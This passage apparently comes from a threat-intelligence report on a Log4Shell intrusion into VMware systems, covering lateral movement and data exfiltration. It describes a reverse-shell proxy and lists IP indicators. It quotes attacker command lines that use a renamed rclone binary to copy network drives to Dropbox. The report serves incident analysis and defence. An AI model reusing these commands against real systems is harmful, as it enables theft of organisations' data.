Log4Shell Vulnerability in VMware Leads to Data Exfiltration and Ransomware

Lateral movement to machines in the network

After the initial infection with Cobalt Strike, we observed that the threat actor dropped node.exe, which is a stowaway proxy tool that is publicly available on Github. The tool is written in the GO language and can provide many capabilities to threat actors: remote shell execution, upload/downloading files, and more. In this case, the tool is used to provide a reverse shell to threat actors on IP: 45[.]32.108.54 on port 80. 

After a successful connection with the command and control (C&C) IP, we saw outbound traffic to several internal machines via SMB and WMI. The files mfeann.exe, Lockdown.DLL, and update.exe (accessed via the node.exe tool) were dropped on the identified internal machines. 

Data exfiltration 

In one case, we found an interesting binary file named update.exe. The file is actually the rclone.exe tool used to exfiltrate data to a specific Dropbox location. While uploading the data, the Rclone tool may upload to different IPs over time:  

162.125.1[.]14 (Dropbox, Inc.)
162.125.1[.]19 (Dropbox, Inc.)
162.125.2[.]14 (Dropbox, Inc.)
162.125.2[.]19 (Dropbox, Inc.)
162.125.7[.]14 (Dropbox, Inc.)
162.125.7[.]19 (Dropbox, Inc.)

CLI command:

cmd.exe /Q /c update.exe copy J: 4:1 -q –ignore-existing –max-age 2y –exclude *.exe 1> \127.0.0.1ADMIN$__1649006901.3590112 2>&1
cmd.exe /Q /c update.exe copy L: 4:2 -q –ignore-existing –max-age 2y –exclude *.exe 1> \127.0.0.1ADMIN$__1649007703.966517 2>&1
cmd.exe /Q /c update.exe copy Q: 4:3 -q –ignore-existing –max-age 2y –exclude *.exe 1> \127.0.0.1ADMIN$__1649007856.0151849 2>&1

In another intrusion, the same tool was used for data exfiltration using a different name: Medias.exe. 

Medias.exe copy ‘\[Private IP] G$’ dropbox:ag -q –ignore-existing –max-age 2y –auto-confirm –multi-thread-streams 12 –transfers 10 –ignore-errors –exclude “*.{mp4,exe,DLL,log,mov,avi,db,ini,lnk}”